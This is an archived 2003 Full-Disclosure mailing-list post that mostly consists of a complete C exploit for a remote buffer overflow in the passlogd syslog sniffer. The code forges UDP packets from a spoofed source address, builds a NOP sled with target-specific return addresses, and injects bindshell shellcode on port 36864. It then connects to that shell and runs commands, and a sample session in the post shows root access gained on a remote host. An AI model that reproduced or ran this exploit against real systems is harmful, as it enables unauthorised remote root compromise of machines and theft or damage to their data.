Hello. Exploit confirmed possible truth in OpenBSD. But, I did not exploit. Also, did not test in RedHat 8.0. Thank you. -- /* ** ** [*] Title: Remote Multiple Buffer Overflow vulnerability in passlogd sniffer. ** [+] Exploit code: 0x82-Remote.passlogd_sniff.xpl.c ** ** [+] Description -- ** ** About: ** passlogd is a purpose-built sniffer for capturing syslog messages in transit. ** This allows for backup logging to be performed on a machine with no open ports. ** ** This program is introduced in securityfocus: http://www.securityfocus.com/tools/2076 ** ** Vulnerability can presume as following. ** There is sl_parse() function to 33 lines of 'parse.c' code. ** ** __ ** ... ** 77 while(pkt[i] != '>'){ ** 78 level[j] = pkt[i]; // This is exploit target. ** 79 i++; ** 80 j++; ** 81 } ** 82 i++; ** ... ** -- ** ** Visual point that change flowing of this program, ** happen after overwrited stack variables. ** Of course, frame pointer overrun exists together. ** ** [+] Vulnerable Packages -- ** ** Vendor site: http://www.morphine.com/src/passlogd.html ** ** passlogd v0.1d ** -passlogd-0.1d.tar.gz ** +FreeBSD ** +OpenBSD ** +Linux ** +Other ** passlogd v0.1c ** -passlogd-0.1c.tar.gz ** passlogd v0.1b ** -passlogd-0.1b.tar.gz ** passlogd v0.1a ** -passlogd-0.1a.tar.gz ** ** [+] Exploit -- ** ** Our proof of concept code was completed. ** Exhibit it sooner or later. ** ** exploit result: -- ** ** bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2 ** ** passlogd sniffer remote buffer overflow root exploit ** by Xpl017Elz. ** ** [0] Set packet code size. ** [1] Set protocol header. ** [2] Make shellcode. ** [3] Set rawsock. ** [4] Send packet. ** [5] Trying 61.37.xxx.xx:36864. ** [*] Connected to 61.37.xxx.xx:36864. ** [*] Executed shell successfully ! ** ** Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown ** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) ** [root@blah /passlogd-0.1d]# ** ** -- ** exploit by "you dong-hun"(Xpl017Elz), <szoahcat_private>. ** My World: http://x82.i21c.net & http://x82.inetcop.org ** */ /* ** -=-= POINT! POINT! POINT! POINT! POINT! =-=- ** ** This exploit is proof of concept. (Therefore, don't support 'Brute-force' mode.) ** ** P.S: ** ** I now, system OS is lacking. :-l ** Although very appreciative people sent account to me. ** uid=0 of this exploit need urgently. hehehe! ** ** Thank you. ** */ #include <stdio.h> #include <unistd.h> #include <errno.h> #include <sys/time.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/udp.h> struct os { int num; char *ost; u_long shell; int l_sz; }; #define Xpl017Elz x82 #define D_M (0) struct os plat[]= { { 0,"ALZZA Linux release 6.1 (Linux One)", /* It's Korean Linux */ 0xbfffaf82,545 }, { 1,"WOW Linux release 6.2 (Puberty)", /* It's Korean Linux */ 0xbfffaf82,545 }, { 2,"RedHat Linux release 7.0 (Guinness)", /* It's my redhat that exist uniquely. */ 0xbfffae82,581 }, { 3,"WOWLiNUX Release 7.1 (Paran)", /* It's Korean Linux */ 0xbfffae82,593 }, { 4,"RedHat Linux release 8.0 (Psyche)", /* It's not to me now. (C0mming s00n) */ 0x82828282,0 // shit. }, { 5,NULL,0,0 } }; void banrl(); int setsock(char *host,int port); void re_connt(int sock); void send_recv_sh(int sock); void usage(char *p_name); int make_sh(u_long shcode,int l_sz); int main(int argc,char **argv) { int sock,whgl,type=D_M; struct hostent *he; struct sockaddr_in hehe; struct iphdr *__ip_hdr_st; struct udphdr *__udp_hdr_st; #ifdef _TEST #define FK_IP "82.82.82.82" /* fake src ip */ #else #define FK_IP "216.239.33.101" /* G00Gl3 */ #endif char spoof_ip[0x82]=FK_IP; #define D_PORT (36864) int port=D_PORT; #define _DMN_NAME #ifdef _DMN_NAME #define LC_TEST "localhost" /* default test host */ #else #define LC_TEST "127.0.0.1" /* localhost */ #endif char host[0x82]=LC_TEST; #ifdef T_ADDR_ #define SHELL 0x82828282 /* test */ #endif u_long shell=plat[type].shell; int l_sz=plat[type].l_sz; int atk_pk_size,make_sh_size; char *__tot_atk_pk,*atk_mbuf; (void)banrl(); if(argc<2) { (void)usage(argv[D_M]); } while((whgl=getopt(argc,argv,"L:l:H:h:F:f:T:t:IiS:s:"))!=-1) { extern char *optarg; switch(whgl) { case 'H': case 'h': memset((char *)host,D_M,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'F': case 'f': memset((char *)spoof_ip,D_M,sizeof(spoof_ip)); strncpy(spoof_ip,optarg,sizeof(spoof_ip)-1); break; case 'L': case 'l': l_sz=atoi(optarg); break; case 'T': case 't': type=atoi(optarg); if(type>4) (void)usage(argv[D_M]); else { shell=plat[type].shell; l_sz=plat[type].l_sz; } break; case 'S': case 's': shell=strtoul(optarg,NULL,NULL); break; case 'I': case 'i': (void)usage(argv[D_M]); break; case '?': fprintf(stderr," Try `%s -i' for more information.\n\n",argv[D_M]); exit(-1); break; } } { fprintf(stdout," [0] Set packet code size.\n"); make_sh_size=strlen((char *)make_sh(shell,l_sz)); atk_pk_size=(sizeof(struct iphdr)+ sizeof(struct udphdr)+make_sh_size); __tot_atk_pk=(char *)malloc(atk_pk_size); memset((char *)__tot_atk_pk,D_M,atk_pk_size); atk_mbuf=(sizeof(struct iphdr)+ sizeof(struct udphdr)+ (char *)__tot_atk_pk); fprintf(stdout," [1] Set protocol header.\n"); __ip_hdr_st=(struct iphdr *)__tot_atk_pk; __udp_hdr_st=(struct udphdr *)(sizeof(struct iphdr)+__tot_atk_pk); fprintf(stdout," [2] Make shellcode.\n"); strncpy(atk_mbuf,(char *)make_sh(shell,l_sz),make_sh_size); } if((he=gethostbyname(host))==NULL) { herror(" gethostbyname()"); exit(-1); } if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))==-1) { perror(" socket()"); exit(-1); } if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,"1",sizeof("1"))==-1) { perror(" setsockopt()"); exit(-1); } fprintf(stdout," [3] Set rawsock.\n"); __ip_hdr_st->version=4; __ip_hdr_st->ihl=sizeof(struct iphdr)/4; __ip_hdr_st->tot_len=htons(atk_pk_size); __ip_hdr_st->ttl=0xff; __ip_hdr_st->protocol=IPPROTO_UDP; __ip_hdr_st->saddr=inet_addr(spoof_ip); __ip_hdr_st->daddr=inet_ntoa(*((struct in_addr *)he->h_addr)); __udp_hdr_st->source=htons(0x82); __udp_hdr_st->dest=htons(0x202); __udp_hdr_st->len=(atk_pk_size); hehe.sin_family=AF_INET; hehe.sin_port=__udp_hdr_st->dest; hehe.sin_addr=*((struct in_addr *)he->h_addr); memset(&(hehe.sin_zero),D_M,(8)); fprintf(stdout," [4] Send packet.\n"); if((sendto(sock,__tot_atk_pk,atk_pk_size,D_M,(struct sockaddr *)&hehe,sizeof(struct sockaddr)))==-1) { perror(" sendto()"); exit(-1); } fprintf(stdout," [5] Trying %s:%d.\n",host,port); sleep(2); sock=(int)setsock(host,port); (void)re_connt(sock); fprintf(stdout," [*] Connected to %s:%d.\n",host,port); (void)send_recv_sh(sock); } int make_sh(u_long shcode,int l_sz) { int plus_sz_plus=D_M,pk_sz=D_M; char shell_code_bind_36864[]={ /* bindshell port 36864 */ 0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10, 0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89, 0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd, 0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89, 0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89, 0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89, 0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c, 0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89, 0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80, 0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66, 0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29, 0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80, 0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07, 0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c, 0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff, 0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68 }; char sh_data_align_4[0x400]; #define NULL_NULL_PSH 0x00 memset((char *)sh_data_align_4,NULL_NULL_PSH,sizeof(sh_data_align_4)); #define NOP_NOP_PSH 0x90 for(pk_sz=D_M;pk_sz<l_sz;pk_sz++) sh_data_align_4[pk_sz]=NOP_NOP_PSH; { sh_data_align_4[pk_sz++]=(shcode>>0)&0xff; sh_data_align_4[pk_sz++]=(shcode>>8)&0xff; sh_data_align_4[pk_sz++]=(shcode>>16)&0xff; sh_data_align_4[pk_sz++]=(shcode>>24)&0xff; sh_data_align_4[pk_sz++]=(0x3e); } for(plus_sz_plus=D_M; plus_sz_plus<sizeof(sh_data_align_4)- strlen(sh_data_align_4)- strlen(shell_code_bind_36864); plus_sz_plus++) sh_data_align_4[pk_sz++]=NOP_NOP_PSH; for(plus_sz_plus=D_M; plus_sz_plus<strlen(shell_code_bind_36864); plus_sz_plus++) sh_data_align_4[pk_sz++]=shell_code_bind_36864[plus_sz_plus]; return strdup(sh_data_align_4); } int setsock(char *hostip,int port) { int sock; struct hostent *he; struct sockaddr_in x82; if((he=gethostbyname(hostip))==NULL) { return(-1); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) { return(-1); } x82.sin_family=AF_INET; x82.sin_port=htons(port); x82.sin_addr=*((struct in_addr *)he->h_addr); memset(&(x82.sin_zero),0,8); if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1) { return(-1); } return(sock); } void re_connt(int sock) { if(sock==-1) { fprintf(stderr," [-] Connect Failed.\n\n"); exit(-1); } } void send_recv_sh(int sock) { int pk; struct timeval tm; char *t_cmd="uname -a;id;exec bash -i\n"; char rbuf[1024]; fd_set rset; memset((char *)rbuf,D_M,sizeof(rbuf)); fprintf(stdout," [*] Executed shell successfully !\n\n"); send(sock,t_cmd,strlen(t_cmd),D_M); tm.tv_sec=10; tm.tv_usec=D_M; while(1) { fflush(stdout); FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock+1,&rset,NULL,NULL,&tm); if(FD_ISSET(sock,&rset)) { pk=read(sock,rbuf,sizeof(rbuf)-1); if(pk<=D_M) { fprintf(stdout," [*] Happy-Exploit\n\n"); exit(D_M); } rbuf[pk]=D_M; fprintf(stdout,"%s",rbuf); } if(FD_ISSET(STDIN_FILENO,&rset)) { pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1); if(pk>D_M) { rbuf[pk]=D_M; write(sock,rbuf,pk); } } } return; } void usage(char *p_name) { int r_s=D_M; fprintf(stdout," Usage: %s -option [argument]\n",p_name); fprintf(stdout,"\n\t-h - hostname.\n"); fprintf(stdout,"\t-f - spoof src ip.\n"); fprintf(stdout,"\t-s - &shellcode.\n"); fprintf(stdout,"\t-l - buf len.\n"); fprintf(stdout,"\t-t - target number.\n"); fprintf(stdout,"\t-i - help information.\n\n"); fprintf(stdout," Select target number:\n\n"); for(;;) { if(plat[r_s].ost==NULL) break; else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost); r_s++; } fprintf(stdout,"\n Example> %s -h localhost -f82.82.82.82 -t3",p_name); fprintf(stdout,"\n Example2> %s -h localhost -s0x82828282 -l582\n\n",p_name); exit(-1); } void banrl() { fprintf(stdout,"\n passlogd sniffer remote buffer overflow root exploit\n"); fprintf(stdout," by Xpl017Elz.\n\n"); } /* eox */ -- -- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 08:55:06 PST